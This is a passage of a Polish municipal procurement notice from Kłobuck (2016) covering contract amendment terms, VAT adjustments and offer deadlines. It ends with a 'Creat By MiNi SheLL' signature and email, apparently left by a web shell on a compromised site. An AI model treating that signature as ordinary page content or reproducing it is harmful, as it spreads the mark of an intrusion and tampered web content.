2.1 w zakresie zmiany terminu zakończenia przedmiotu zamówienia o określoną liczbę dni, 
    w których nie można było wykonywać opracowania, dopuszczalne jest wprowadzenie zmian 
    spowodowanych dokumentowanymi: 
     1) okolicznościami leżącymi po stronie Zamawiającego,
     2) zmianami będącymi następstwem działania organów administracji, 
     3) innymi przyczynami zewnętrznymi niezależnymi od Wykonawcy, skutkującymi niemożnością 
    rozpoczęcia lub prowadzenia prac pomimo zachowania należytej staranności.
W przypadku wystąpienia którejkolwiek z okoliczności wymienionych w niniejszym ustępie termin  wykonania umowy może ulec odpowiedniemu przedłużeniu, o czas niezbędny do zakończenia wykonywania przedmiotu umowy w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności.
2.2  w zakresie zmiany obowiązującej stawki VAT:
1) jeśli zmiana stawki VAT będzie powodować zwiększenie kosztów wykonania umowy po stronie Wykonawcy, Zamawiający dopuszcza możliwość zwiększenia wynagrodzenia o kwotę równą różnicy w  kwocie podatku VAT zapłaconego  przez Wykonawcę,
2) jeśli zmiana stawki VAT będzie powodować zmniejszenie kosztów wykonania umowy po stronie  Wykonawcy, Wykonawca wyraża zgodę na zmniejszenie wynagrodzenia o kwotę stanowiącą  różnicę kwoty podatku VAT spowodowana obniżeniem stawki podatku VAT.

3. W zakresie pozostałych zmian wynikających ze zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy. Strony z zachowaniem zasad uczciwej konkurencji oraz poszanowania interesów każdej ze stron będą zmierzać do dostosowania umowy do zmian wynikających z wprowadzenia nowych przepisów prawa. W takim wypadku zmiany umowy ograniczać się będą do konieczności wynikającej ze zmiany powszechnie obowiązującego prawa, tj. nie mogą być dokonane wówczas, gdy przepisy takie mają charakter dyspozycyjny (względnie obowiązujący).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://gminaklobuck.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Kłobucku; 
ul. 11 Listopada 6; 
42-100 Kłobuck; w pokoju nr 4.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.08.2016 godzina 11:30, miejsce: Urząd Miejski w Kłobucku; 
ul. 11 Listopada 6; 
42-100 Kłobuck, w pokoju nr 25.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com